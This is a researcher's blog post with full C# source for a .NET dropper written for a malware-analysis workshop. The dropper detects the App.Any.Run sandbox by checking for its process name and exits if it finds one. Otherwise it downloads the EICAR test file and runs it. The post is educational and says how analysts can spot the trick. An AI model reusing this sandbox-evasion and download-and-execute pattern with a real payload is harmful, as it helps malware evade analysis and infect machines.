The goal of the research was to create a small dropper that creates no detection within the famous App.Any.Run Sandbox solution but can still determine if its running in the sandbox or not.
For now, i cant tell if that also affects the searcher and hunter version, but for the free one it works just fine.
This was created for a workshop about malware analysis for one of my clients and it should demonstrate how easy tools like App.Any.Run and other Sandbox Solutions can be tricked and that they can not replace human analysts. To be clear the sandbox in my opinion is very good and i can recommend it as a first analyse step, but It must be clear that even something called “heavy anti evasion” can not detect everything and can only be seen as a help for the human analyst.
The following code acts as a dropper (.NET) that drops the eicar test file with the “enhanced functionality” to not get detected by App.Any.Run sandbox, even with Heavy Anti-Evasion turned on.
It simply checks for a running executable that always runs in the current version, not advanced and no rocket since at all. Killing the process (qemu-ga.exe) would result in termination of the connection to the guest os. However, this requires administrative access so in the below sample we just quit our sample after detecting the agent running.
Update: The process qemu-ga.exe changed to the static name q.exe. This is to unspecific to directly act on, therefore I changed the source to check for windanr.exe, another static artifact on App.Any.Run sandbox.
Detecting the attack is fairly simple. Most malware analysts would probably immediately check why the app quits directly after the start and patch it out, however more junior analysts might get tricked by this.
Old Sample URL: Initial Sample
New Sample URL: Updated Sample
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 | using System; /// <summary> /// This code was created for a workshop to show how easy it can be /// to trick "next generation security" products. /// It should demonstrate that even a thing called ///"Heavy anti evasion" is not that heavy. /// In no way i would say the targeted sandbox is a bad project - /// i love it! But everyone needs to understand the limitations. /// /// This is not a tool that provides any illegal information. ///We do not promote hacking or software cracking. ///All the information provided on these pages is for educational purposes only. /// The authors of this tool are not responsible for any misuse of the information. ///You shall not misuse the information to gain unauthorized access and/or write malicious programs. /// This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. /// You may try all of these techniques on your own computer at your own risk. /// Performing any hack attempts/tests without written permission from the owner of the computer system is illegal. /// IN NO EVENT SHALL THE CREATORS, OWNER, OR CONTRIBUTORS BE LIABLE FOR ///ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL ///DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE ///GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS ///INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER ///IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR ///OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ////ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. /// </summary> namespace Heavy_anti_evasion_bypass { class Program { static void Main(string[] args) { foreach (var process in System.Diagnostics.Process.GetProcessesByName("windanr")) { Environment.Exit(1); } //sandbox check survived string remoteUri = "http://www.eicar.org/download/eicar.com"; string saveFileName = "eicar.com"; System.Net.WebClient myWebClient = new System.Net.WebClient(); myWebClient.DownloadFile(remoteUri, saveFileName); System.Diagnostics.Process.Start(saveFileName); } } } |
Company Reviews